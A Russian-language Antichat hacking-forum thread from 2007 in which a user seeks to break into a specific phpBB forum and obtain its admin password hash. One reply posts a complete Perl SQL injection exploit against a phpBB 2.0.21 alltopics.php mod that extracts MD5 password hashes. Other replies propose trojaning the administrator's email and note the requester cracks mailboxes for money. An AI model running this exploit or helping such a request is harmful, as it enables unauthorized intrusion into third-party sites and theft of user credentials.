ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Powered by phpBB and NoseBleed v1.12
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Powered by phpBB and NoseBleed v1.12
  #1  
Старый 27.05.2007, 18:00
Аватар для Petr
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию Powered by phpBB and NoseBleed v1.12
Поиск по запросу NoseBleed вообще нечиго не выдает.
Версию с помощью docs/CHANGELOG.html не получилось узнать. пишет
Код:
Forbidden
You don't have permission to access /docs/CHANGELOG.html on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Форум адреса таким образом расположен
http://forum.*****.ru
Это что-то меняет?
и какие уязвимости есть у этого движка? мне бы хеш админский достать.
 
Ответить с цитированием

  #2  
Старый 28.05.2007, 14:31
Аватар для Morfusha
Morfusha
Новичок
Регистрация: 27.04.2006
Сообщений: 1
Провел на форуме:
103931

Репутация: 0
Отправить сообщение для Morfusha с помощью ICQ
По умолчанию
1. http://forum.*****.ru это ничего не меняет
2. Для phpbb 2.0.21 в пабилке сплойтов нету
 
Ответить с цитированием

  #3  
Старый 28.05.2007, 18:04
Аватар для Petr
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию
Powered by phpBB and NoseBleed v1.12 - это разве 2.0.21 ?
 
Ответить с цитированием

  #4  
Старый 28.05.2007, 18:30
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от Sandjuro  
Powered by phpBB and NoseBleed v1.12 - это разве 2.0.21 ?

The original NoseBleed v1.12 skin for phpBB version 2+
Created by Mike Lothar (c) 2004 - 2005
http://www.mikelothar.com
Do not remove this copyright note
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #5  
Старый 04.06.2007, 15:51
Аватар для REDsaratov
REDsaratov
Участник форума
Регистрация: 17.12.2006
Сообщений: 191
Провел на форуме:
415254

Репутация: 75
Отправить сообщение для REDsaratov с помощью ICQ
По умолчанию
Попробуй этот
Цитата:
ђЇ†man.inc.
23.08.2006, 21:07
#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod:http:"//"www".phpbbhacks.com/download/2821 +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
Последний раз редактировалось REDsaratov; 04.06.2007 в 15:56..
 
Ответить с цитированием

  #6  
Старый 06.06.2007, 01:09
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию
Блин. сплоит выше это сплоит на оч редкий мод.
Есть 2 варианта:
1. Достать админ пароль
2. Троянить почту, тем более что ты почту ломаешь мегаацки и за деньги

Если админ стер /docs/CHANGELOG.html, то это уже что-то значит...
 
Ответить с цитированием

  #7  
Старый 09.06.2007, 22:58
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию
Кстати, еще инфа к размышлению:

http://www.securitylab.ru/vulnerability/281494.php

Исправлена в 2.0.22
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ